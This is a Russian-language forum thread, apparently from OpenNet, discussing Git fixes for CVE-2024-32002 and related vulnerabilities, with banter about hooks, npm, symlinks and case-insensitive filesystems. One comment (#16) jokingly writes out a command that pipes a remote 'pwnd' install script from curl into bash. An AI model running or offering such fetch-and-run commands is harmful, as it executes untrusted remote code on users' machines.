![]() |
Пред. тема | След. тема | ||
Форум Разговоры, обсуждение новостей | |||
---|---|---|---|
Изначальное сообщение | [ Отслеживать ] |
"Пять уязвимостей в Git, среди которых одна критическая и две опасные" | +/– | ![]() |
Сообщение от opennews (??), 16-Май-24, 00:25 | ||
Опубликованы корректирующие выпуски распределённой системы управления исходными текстами Git 2.45.1, 2.44.1, 2.43.4, 2.42.2, 2.41.1, 2.40.2 и 2.39.4, в которых устранены пять уязвимостей. Наиболее серьёзная уязвимость (CVE-2024-32002), которой присвоен критический уровень опасности, позволяет добиться выполнения кода злоумышленника при выполнении клонирования командой "git clone" репозитория, подконтрольного атакующему... | ||
Ответить | Правка | Cообщить модератору |
Оглавление |
Сообщения | [Сортировка по ответам | RSS] |
1. Сообщение от Аноним (1), 16-Май-24, 00:25 | +/– | ![]() |
Для симлинков в винде нужны права администратора. | ||
Ответить | Правка | Наверх | Cообщить модератору | ||
Ответы: #5, #6, #33, #46 |
3. Сообщение от Аноним (3), 16-Май-24, 00:26 | +7 +/– | ![]() |
> приведёт к выполнению этих hook-ов | ||
Ответить | Правка | Наверх | Cообщить модератору | ||
Ответы: #4, #8, #14, #17, #68 |
4. Сообщение от Аноним (1), 16-Май-24, 00:29 | +1 +/– | ![]() |
>хуки устанавливаются таким куском фекалий, как npm-пакет husky | ||
Ответить | Правка | Наверх | Cообщить модератору | ||
Родитель: #3 Ответы: #48 |
5. Сообщение от Аноним (1), 16-Май-24, 00:32 | –2 +/– | ![]() |
Вернее не права администратора, а SeCreateSymbolicLinkPrivilege (которая обычно даётся при "Запустить от имени админестратора"). | ||
Ответить | Правка | Наверх | Cообщить модератору | ||
Родитель: #1 |
6. Сообщение от нах. (?), 16-Май-24, 00:39 | +/– | ![]() |
найди мне модного современного разработчика-под-линукс не выклянчившего/вымутившего/вышантажировавшего себе админских прав на своей вянде? | ||
Ответить | Правка | Наверх | Cообщить модератору | ||
Родитель: #1 Ответы: #11 |
8. Сообщение от Васян (?), 16-Май-24, 00:47 | +3 +/– | ![]() |
Так тут не git, а npm пачкает все фекалиями | ||
Ответить | Правка | Наверх | Cообщить модератору | ||
Родитель: #3 Ответы: #60 |
11. Сообщение от pavlinux (ok), 16-Май-24, 00:50 | –1 +/– | ![]() |
Ну я, чо дальше? : | ||
Ответить | Правка | Наверх | Cообщить модератору | ||
Родитель: #6 Ответы: #16, #35 |
12. Сообщение от pavlinux (ok), 16-Май-24, 00:51 | –8 +/– | ![]() |
> позволяет добиться выполнения кода злоумышленника при выполнении клонирования командой "git clone" | ||
Ответить | Правка | Наверх | Cообщить модератору | ||
Ответы: #31 |
13. Сообщение от Аноним (13), 16-Май-24, 00:55 | +/– | ![]() |
Я помню в одной конторе настроили хуки так что оно писало об изменениях в программе в slack (пока этот чат не стал платным для владельца). Двоякое ощущение - вроде бы и удобно для менеджмента, а вроде бы как и не очень - отвлекало немного. А ещё когда делают процесс с код-ревью и мелкими задачами, так вообще не айс. | ||
Ответить | Правка | Наверх | Cообщить модератору | ||
Ответы: #62 |
14. Сообщение от Витюшка (?), 16-Май-24, 00:57 | +5 +/– | ![]() |
Так это касается любых языков программирования и систем сборки и репозиториев и любых пакетов дистрибутива - там тоже выполняются postinstall bash-портянки, только от рута уже. | ||
Ответить | Правка | Наверх | Cообщить модератору | ||
Родитель: #3 Ответы: #29, #37, #56 |
16. Сообщение от Аноним (16), 16-Май-24, 01:07 | +5 +/– | ![]() |
Непонятно, зачем нужен эксплойт, если можно сказать ему запустить `curl https://github.com/jiatan/pwnd/blob/master/install.sh | bash', и он запустит | ||
Ответить | Правка | Наверх | Cообщить модератору | ||
Родитель: #11 Ответы: #32 |
17. Сообщение от Аноним (17), 16-Май-24, 01:43 | –1 +/– | ![]() |
NPM по хорошему в докер убирать надо. | ||
Ответить | Правка | Наверх | Cообщить модератору | ||
Родитель: #3 Ответы: #20, #25, #49 |
19. Сообщение от Аноним (19), 16-Май-24, 02:00 | –1 +/– | ![]() |
> например, используемых по умолчанию в Windows и macOS | ||
Ответить | Правка | Наверх | Cообщить модератору | ||
Ответы: #23 |
20. Сообщение от Аноним (20), 16-Май-24, 02:08 | +2 +/– | ![]() |
Попрошу ещё поглубже, пожалуйста | ||
Ответить | Правка | Наверх | Cообщить модератору | ||
Родитель: #17 |
23. Сообщение от Аноним (23), 16-Май-24, 02:19 | +2 +/– | ![]() |
Ну вообще-то apfs которая используется на системном диске как раз case insensitive. Так что если ты застрял на hfs+ со своим макбуком 2008 года с авито, то с разморозочкой. | ||
Ответить | Правка | Наверх | Cообщить модератору | ||
Родитель: #19 Ответы: #28 |
24. Сообщение от Изя (?), 16-Май-24, 02:31 | +/– | ![]() |
И две смешные | ||
Ответить | Правка | Наверх | Cообщить модератору | ||
25. Сообщение от Аноним (25), 16-Май-24, 02:35 | –1 +/– | ![]() |
Докер стоит денег. И в целом от этой проблемы вас не спасёт. | ||
Ответить | Правка | Наверх | Cообщить модератору | ||
Родитель: #17 |
28. Сообщение от Аноним (28), 16-Май-24, 03:11 | +/– | ![]() |
А я-то думал, откуда это лишение фич прогрессом обзывают. А оно вон как, the usual suspects. Не сидится им на маке почему-то. | ||
Ответить | Правка | Наверх | Cообщить модератору | ||
Родитель: #23 Ответы: #30, #44 |
29. Сообщение от penetrator (?), 16-Май-24, 03:14 | +/– | ![]() |
это касается не только Linux | ||
Ответить | Правка | Наверх | Cообщить модератору | ||
Родитель: #14 |
30. Сообщение от Аноним (23), 16-Май-24, 03:38 | +/– | ![]() |
> лишение фич | ||
Ответить | Правка | Наверх | Cообщить модератору | ||
Родитель: #28 |
31. Сообщение от Аноним (31), 16-Май-24, 06:03 | +2 +/– | ![]() |
Выполняется не код, а команда. С нежелательными побочными эффектами - после ожидаемого клонирования репозитория тебе еще неожиданно сносят хомяк. | ||
Ответить | Правка | Наверх | Cообщить модератору | ||
Родитель: #12 Ответы: #43 |
32. Сообщение от Аноним (32), 16-Май-24, 06:21 | +3 +/– | ![]() |
Между git и curl | bash большая разница. Человек, запускающий curl | bash, понимает, что запустит код. А при клонировании git-репозиториев код должен только скачиваться, но не запускаться - но таки запускается. Это как если бы при просмотре специально подготовленной картинки все куки из браузера отправлялись кому не надо. | ||
Ответить | Правка | Наверх | Cообщить модератору | ||
Родитель: #16 Ответы: #53 |
33. Сообщение от Аноним (33), 16-Май-24, 06:36 | +/– | ![]() |
Никого не волнует что там в винде происходит | ||
Ответить | Правка | Наверх | Cообщить модератору | ||
Родитель: #1 Ответы: #34 |
34. Сообщение от Аноним (34), 16-Май-24, 07:08 | +/– | ![]() |
То ли дело 2%, ага. | ||
Ответить | Правка | Наверх | Cообщить модератору | ||
Родитель: #33 Ответы: #36 |
35. Сообщение от User (??), 16-Май-24, 07:30 | +1 +/– | ![]() |
Этож как накосячить-то надо было, чтоб совсем-совсем не выдали, а? Порнобаннеров с шифррвальщиками с варезника нацеплял, или что? | ||
Ответить | Правка | Наверх | Cообщить модератору | ||
Родитель: #11 Ответы: #40, #42 |
36. Сообщение от Аноним (36), 16-Май-24, 08:26 | –1 +/– | ![]() |
~4.8% без учёта ChromeOS | ||
Ответить | Правка | Наверх | Cообщить модератору | ||
Родитель: #34 Ответы: #38 |
37. Сообщение от Аноним (36), 16-Май-24, 08:30 | +/– | ![]() |
>Мне как раз на системные файлы плевать - снёс/заново установил и проблем нет. | ||
Ответить | Правка | Наверх | Cообщить модератору | ||
Родитель: #14 |
38. Сообщение от Аноним (34), 16-Май-24, 08:34 | +1 +/– | ![]() |
https://radar.yandex.ru/desktop утверждает иное: 2.77% всего недесктопного кроме винды и макоси. В общем на уровне погрешности измерений. | ||
Ответить | Правка | Наверх | Cообщить модератору | ||
Родитель: #36 Ответы: #63 |
39. Сообщение от 1 (??), 16-Май-24, 09:25 | +/– | ![]() |
А вот у меня вопрос - откуда столько версий git ? Аж 7 в этой новости насчитал. Типа для каждого питона свой гит ? | ||
Ответить | Правка | Наверх | Cообщить модератору | ||
Ответы: #45 |
40. Сообщение от Аноним (40), 16-Май-24, 09:49 | +1 +/– | ![]() |
варианта с отсутствием венды не рассматривали совсем? по какой причине? | ||
Ответить | Правка | Наверх | Cообщить модератору | ||
Родитель: #35 Ответы: #51 |
42. Сообщение от нах. (?), 16-Май-24, 09:52 | +1 +/– | ![]() |
> Этож как накосячить-то надо было, чтоб совсем-совсем не выдали, а? Порнобаннеров с | ||
Ответить | Правка | Наверх | Cообщить модератору | ||
Родитель: #35 |
43. Сообщение от нах. (?), 16-Май-24, 09:53 | +1 +/– | ![]() |
> Выполняется не код, а команда. С нежелательными побочными эффектами - после ожидаемого | ||
Ответить | Правка | Наверх | Cообщить модератору | ||
Родитель: #31 Ответы: #76 |
44. Сообщение от нах. (?), 16-Май-24, 09:55 | +2 +/– | ![]() |
> А я-то думал, откуда это лишение фич прогрессом обзывают. | ||
Ответить | Правка | Наверх | Cообщить модератору | ||
Родитель: #28 Ответы: #54, #58 |
45. Сообщение от нах. (?), 16-Май-24, 09:56 | +/– | ![]() |
> А вот у меня вопрос - откуда столько версий git ? Аж | ||
Ответить | Правка | Наверх | Cообщить модератору | ||
Родитель: #39 |
46. Сообщение от Да ну нахер (?), 16-Май-24, 10:09 | +/– | ![]() |
Можно в режим разработчика перевести, тогда не нужны. Правда нужны права на сам перевод. | ||
Ответить | Правка | Наверх | Cообщить модератору | ||
Родитель: #1 |
47. Сообщение от Аноним (-), 16-Май-24, 10:33 | +/– | ![]() |
> Уязвимость проявляется только в файловых системах, | ||
Ответить | Правка | Наверх | Cообщить модератору | ||
Ответы: #66 |
48. Сообщение от Аноним (-), 16-Май-24, 10:35 | +1 +/– | ![]() |
>> хуки устанавливаются таким куском фекалий, как npm-пакет husky | ||
Ответить | Правка | Наверх | Cообщить модератору | ||
Родитель: #4 |
49. Сообщение от Аноним (-), 16-Май-24, 10:36 | +/– | ![]() |
> NPM по хорошему в докер убирать надо. | ||
Ответить | Правка | Наверх | Cообщить модератору | ||
Родитель: #17 |
51. Сообщение от User (??), 16-Май-24, 11:29 | +3 +/– | ![]() |
> варианта с отсутствием венды не рассматривали совсем? по какой причине? | ||
Ответить | Правка | Наверх | Cообщить модератору | ||
Родитель: #40 Ответы: #61, #85 |
53. Сообщение от кент кента (?), 16-Май-24, 11:47 | +/– | ![]() |
>Человек, запускающий curl | bash, понимает, что запустит код. | ||
Ответить | Правка | Наверх | Cообщить модератору | ||
Родитель: #32 Ответы: #84 |
54. Сообщение от Аноним (28), 16-Май-24, 13:18 | +/– | ![]() |
>никому на самом деле не нужны File fIle и file и скорее всего все три раза имелось в виду одно и то же | ||
Ответить | Правка | Наверх | Cообщить модератору | ||
Родитель: #44 |
55. Сообщение от Аноним (56), 16-Май-24, 14:29 | +/– | ![]() |
> Уязвимость проявляется только в файловых системах, не различающих регистр символов... | ||
Ответить | Правка | Наверх | Cообщить модератору | ||
56. Сообщение от Аноним (56), 16-Май-24, 14:35 | +/– | ![]() |
Стандартные пакеты ревьювят, а хлам от JS мaкaк - нет | ||
Ответить | Правка | Наверх | Cообщить модератору | ||
Родитель: #14 |
58. Сообщение от Аноним (56), 16-Май-24, 14:39 | –5 +/– | ![]() |
Да, есть нюанс: теперь своим нюансом собираете кучу багов в разном софте. Выбор макоси разработчиком такой же признак проф непригодности, как и выбор винды | ||
Ответить | Правка | Наверх | Cообщить модератору | ||
Родитель: #44 Ответы: #59, #70, #72 |
59. Сообщение от нах. (?), 16-Май-24, 14:46 | +4 +/– | ![]() |
> Да, есть нюанс: теперь своим нюансом собираете кучу багов в разном софте. | ||
Ответить | Правка | Наверх | Cообщить модератору | ||
Родитель: #58 |
60. Сообщение от Бывалый Смузихлёб (ok), 16-Май-24, 15:22 | +/– | ![]() |
> Так тут не git, а npm пачкает все фекалиями | ||
Ответить | Правка | Наверх | Cообщить модератору | ||
Родитель: #8 |
61. Сообщение от Аноним (61), 16-Май-24, 16:27 | +1 +/– | ![]() |
Ну не знаю. Винды не видел уже года с 2009-го, в последнее время вообще ни с чем никаких проблем не возникало даже с заказчиками с виндовой инфраструктурой. MS Teams и прочие аутлуки-офисы через веб нормально работают, AnyConnect под Линукс есть, кривой, но работает. Скайп в последний раз заказчик использовал 8 лет назад, тогда он работал, и уже тогда это воспринималось как что-то ретроградное. | ||
Ответить | Правка | Наверх | Cообщить модератору | ||
Родитель: #51 Ответы: #64 |
62. Сообщение от Аноним (61), 16-Май-24, 16:38 | +/– | ![]() |
Так это обычно в отдельный канал в Слаке делают. Я это сразу в mute отправляю, намного гибче через email с уведомлениями по фильтрам только на нужное. Ну кому-то удобно, пусть читают, я ж не против. | ||
Ответить | Правка | Наверх | Cообщить модератору | ||
Родитель: #13 |
63. Сообщение от Аноним (61), 16-Май-24, 16:40 | –1 +/– | ![]() |
Ага, и все в этой статистике - разработчики, использующие git :-) | ||
Ответить | Правка | Наверх | Cообщить модератору | ||
Родитель: #38 Ответы: #65, #78 |
64. Сообщение от User (??), 16-Май-24, 18:12 | +/– | ![]() |
>[оверквотинг удален] | ||
Ответить | Правка | Наверх | Cообщить модератору | ||
Родитель: #61 Ответы: #69 |
65. Сообщение от Аноним (65), 16-Май-24, 18:19 | +/– | ![]() |
На кой? Конкретно у меня под виндой гит нативный стоит, а не в виртуалке с ненужным. За всех остальных говорить не буду, но скорее всего то же самое. | ||
Ответить | Правка | Наверх | Cообщить модератору | ||
Родитель: #63 |
66. Сообщение от Аноним (65), 16-Май-24, 18:21 | +/– | ![]() |
Сюрприз: чувствительность к регистру в NTFS можно включить если делать нечего. А в файлухах ненужного её можно выключить? | ||
Ответить | Правка | Наверх | Cообщить модератору | ||
Родитель: #47 Ответы: #73 |
68. Сообщение от Аноним (68), 16-Май-24, 18:41 | +/– | ![]() |
> Хуки -- мерзотнейшая штука | ||
Ответить | Правка | Наверх | Cообщить модератору | ||
Родитель: #3 Ответы: #80 |
69. Сообщение от Аноним (61), 16-Май-24, 19:20 | +1 +/– | ![]() |
А, ну да, с такими тяжело. Сочувствую. Я предпочитаю работать с малым-средним частным бизнесом, стартапами сегодняшними или вчерашними. Интересной работы много, платят хорошо, когда понимают за что (за результат качественно и в срок), мозги никто не компостирует. Да, есть и минусы - бизнес может прогореть, стартап может не получить очередой раунд инвестиций, ну и ладно, другие довольно быстро найдутся. | ||
Ответить | Правка | Наверх | Cообщить модератору | ||
Родитель: #64 Ответы: #74 |
70. Сообщение от Аноним (70), 16-Май-24, 20:44 | +1 +/– | ![]() |
> Выбор макоси разработчиком такой же признак проф непригодности | ||
Ответить | Правка | Наверх | Cообщить модератору | ||
Родитель: #58 Ответы: #71 |
71. Сообщение от Аноним (25), 17-Май-24, 00:49 | –1 +/– | ![]() |
Вставлю своё примечание в ваш разговор в ответ именно на это сообщение - на gentoo или arch в таком уж случае. А в целом настоящий программист? Смешно звучит. Это как у баб - настоящий мужик должен... | ||
Ответить | Правка | Наверх | Cообщить модератору | ||
Родитель: #70 |
72. Сообщение от Аноним (25), 17-Май-24, 00:53 | +/– | ![]() |
О, а что вы скажете о пользователях айфона и маках? Полагаю именно это клиенты этого американского подделия и именно для них сей человек программирует. | ||
Ответить | Правка | Наверх | Cообщить модератору | ||
Родитель: #58 |
73. Сообщение от Аноним (-), 17-Май-24, 04:35 | +/– | ![]() |
> Сюрприз: чувствительность к регистру в NTFS можно включить если делать нечего. | ||
Ответить | Правка | Наверх | Cообщить модератору | ||
Родитель: #66 Ответы: #93 |
74. Сообщение от Аноним (-), 17-Май-24, 04:42 | +1 +/– | ![]() |
> А, ну да, с такими тяжело. Сочувствую. Я предпочитаю работать с малым-средним | ||
Ответить | Правка | Наверх | Cообщить модератору | ||
Родитель: #69 Ответы: #87 |
76. Сообщение от Аноним (76), 17-Май-24, 04:47 | +/– | ![]() |
>> Выполняется не код, а команда. С нежелательными побочными эффектами - после ожидаемого | ||
Ответить | Правка | Наверх | Cообщить модератору | ||
Родитель: #43 Ответы: #77 |
77. Сообщение от нах. (?), 17-Май-24, 12:38 | +/– | ![]() |
> А такие как ты даже и добровольно запустят, если процент предложить. | ||
Ответить | Правка | Наверх | Cообщить модератору | ||
Родитель: #76 Ответы: #90 |
78. Сообщение от нах. (?), 17-Май-24, 12:42 | +/– | ![]() |
> Даже на Винде, скорее всего, половина пользуются гитом внутри WSL. | ||
Ответить | Правка | Наверх | Cообщить модератору | ||
Родитель: #63 Ответы: #79, #81 |
79. Сообщение от Аноним (79), 17-Май-24, 13:57 | +/– | ![]() |
Ко встроенным эта уязвимость не относится же? Или там не что-то вроде libgit2, а тупо консольный git с собой таскают и exec-ают? | ||
Ответить | Правка | Наверх | Cообщить модератору | ||
Родитель: #78 Ответы: #83 |
80. Сообщение от Аноним (79), 17-Май-24, 14:02 | +/– | ![]() |
Это всё привет от технологий начала 80-х, когда засунуть везде свой Тьюринг-полный DSL казалось прекрасной идеей - гибко же ж. До червя Морриса оставалось ещё 5 лет. | ||
Ответить | Правка | Наверх | Cообщить модератору | ||
Родитель: #68 |
81. Сообщение от Аноним (81), 17-Май-24, 14:23 | +1 +/– | ![]() |
> на винде гит встроен в visual studio (не шва6одкину подделку а настоящую) | ||
Ответить | Правка | Наверх | Cообщить модератору | ||
Родитель: #78 Ответы: #82 |
82. Сообщение от нах. (?), 17-Май-24, 19:30 | +2 +/– | ![]() |
ну да, ну да, одного. Пара сотен разработчиков (кажется, кто-то работал на MS) не в счет ведь. | ||
Ответить | Правка | Наверх | Cообщить модератору | ||
Родитель: #81 |
83. Сообщение от нах. (?), 17-Май-24, 19:32 | +/– | ![]() |
> Ко встроенным эта уязвимость не относится же? Или там не что-то вроде | ||
Ответить | Правка | Наверх | Cообщить модератору | ||
Родитель: #79 |
84. Сообщение от Аноним (84), 18-Май-24, 12:16 | +/– | ![]() |
"Две большие разницы" - заинтересовать запуском скрипта и заинтересовать просмотром кода. | ||
Ответить | Правка | Наверх | Cообщить модератору | ||
Родитель: #53 |
85. Сообщение от Рмшъ (?), 20-Май-24, 11:03 | +/– | ![]() |
Есть ведь и фронтендеры на удалёнке. Переговорки не актуальны, с заказчиками общается менеджер, по vpn ходит бэкендер, госты вообще в последний раз были в универе ещё до Медведева. | ||
Ответить | Правка | Наверх | Cообщить модератору | ||
Родитель: #51 Ответы: #86 |
86. Сообщение от User (??), 20-Май-24, 11:14 | +/– | ![]() |
> Есть ведь и фронтендеры на удалёнке. Переговорки не актуальны, с заказчиками общается | ||
Ответить | Правка | Наверх | Cообщить модератору | ||
Родитель: #85 |
87. Сообщение от User (??), 20-Май-24, 12:14 | +/– | ![]() |
Ну в общем не буду спорить - все так и есть. У каждого выбора свои плюсы и свои минусы. | ||
Ответить | Правка | Наверх | Cообщить модератору | ||
Родитель: #74 Ответы: #88, #89 |
88. Сообщение от Аноним (-), 20-Май-24, 16:55 | +/– | ![]() |
> Ну в общем не буду спорить - все так и есть. У каждого выбора свои плюсы и свои минусы. | ||
Ответить | Правка | Наверх | Cообщить модератору | ||
Родитель: #87 Ответы: #91 |
89. Сообщение от Аноним (-), 20-Май-24, 16:57 | +/– | ![]() |
> мешает, честно. Во времена не столь отдаленные вот и вовсе триатлоном | ||
Ответить | Правка | Наверх | Cообщить модератору | ||
Родитель: #87 Ответы: #92 |
90. Сообщение от Аноним (-), 20-Май-24, 17:05 | +/– | ![]() |
>> А такие как ты даже и добровольно запустят, если процент предложить. | ||
Ответить | Правка | Наверх | Cообщить модератору | ||
Родитель: #77 |
91. Сообщение от User (??), 20-Май-24, 20:37 | +/– | ![]() |
>> Ну в общем не буду спорить - все так и есть. У каждого выбора свои плюсы и свои минусы. | ||
Ответить | Правка | Наверх | Cообщить модератору | ||
Родитель: #88 |
92. Сообщение от User (??), 20-Май-24, 20:40 | +/– | ![]() |
>> мешает, честно. Во времена не столь отдаленные вот и вовсе триатлоном | ||
Ответить | Правка | Наверх | Cообщить модератору | ||
Родитель: #89 |
93. Сообщение от Аноним (93), 21-Май-24, 18:04 | +/– | ![]() |
Начиная с Windows 10 сборки 17107 чувствительность к регистру можно включить даже для конкретного каталога: | ||
Ответить | Правка | Наверх | Cообщить модератору | ||
Родитель: #73 |
Архив | Удалить |
Рекомендовать для помещения в FAQ | Индекс форумов | Темы | Пред. тема | След. тема |
Закладки на сайте Проследить за страницей |
Created 1996-2025 by Maxim Chirkov Добавить, Поддержать, Вебмастеру |